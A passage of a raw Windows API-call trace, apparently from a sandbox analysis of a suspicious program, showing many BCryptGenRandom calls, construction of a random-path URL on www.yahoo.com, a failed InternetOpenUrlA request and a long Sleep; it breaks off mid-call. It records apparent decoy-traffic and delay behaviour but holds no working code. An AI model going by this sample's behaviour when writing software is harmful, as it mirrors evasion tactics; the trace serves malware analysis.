BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0169.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0208b, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a0208b) returned 0x0 [0169.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020ad, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a020ad) returned 0x0 [0169.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020be, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a020be) returned 0x0 [0169.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0169.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0169.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.734] GetProcessHeap () returned 0x440000 [0169.734] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0169.734] lstrcpyA (in: lpString1=0x473350, lpString2="\x8eW@Çs://www.yahoo.com" | out: lpString1="\x8eW@Çs://www.yahoo.com") returned="\x8eW@Çs://www.yahoo.com" [0169.734] lstrcatA (in: lpString1="\x8eW@Çs://www.yahoo.com", lpString2="/et9pnv4VtdxtJocppt2nvk/74dcv6dl1zrbyvt1tCxqbqkQ9n5fduC34n/sbwau0xc4Msfuyh7Saza3Hnh9tffupmid/cttnluxpkp7q1ky6/z3g2GsyQ63lqdwra5i8GQg1t3Tz21/" | out: lpString1="\x8eW@Çs://www.yahoo.com/et9pnv4VtdxtJocppt2nvk/74dcv6dl1zrbyvt1tCxqbqkQ9n5fduC34n/sbwau0xc4Msfuyh7Saza3Hnh9tffupmid/cttnluxpkp7q1ky6/z3g2GsyQ63lqdwra5i8GQg1t3Tz21/") returned="\x8eW@Çs://www.yahoo.com/et9pnv4VtdxtJocppt2nvk/74dcv6dl1zrbyvt1tCxqbqkQ9n5fduC34n/sbwau0xc4Msfuyh7Saza3Hnh9tffupmid/cttnluxpkp7q1ky6/z3g2GsyQ63lqdwra5i8GQg1t3Tz21/" [0169.734] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0169.734] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x8eW@Çs://www.yahoo.com/et9pnv4VtdxtJocppt2nvk/74dcv6dl1zrbyvt1tCxqbqkQ9n5fduC34n/sbwau0xc4Msfuyh7Saza3Hnh9tffupmid/cttnluxpkp7q1ky6/z3g2GsyQ63lqdwra5i8GQg1t3Tz21/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0169.734] GetProcessHeap () returned 0x440000 [0169.734] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0169.734] GetProcessHeap () returned 0x440000 [0169.735] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02050 | out: hHeap=0x440000) returned 1 [0169.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0169.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0169.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0169.736] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0169.736] Sleep (dwMilliseconds=0x12cca) [0170.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0170.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.074] GetProcessHeap () returned 0x440000 [0170.074] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5330 [0170.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5331, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x4f5331) returned 0x0 [0170.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.075] GetProcAddress 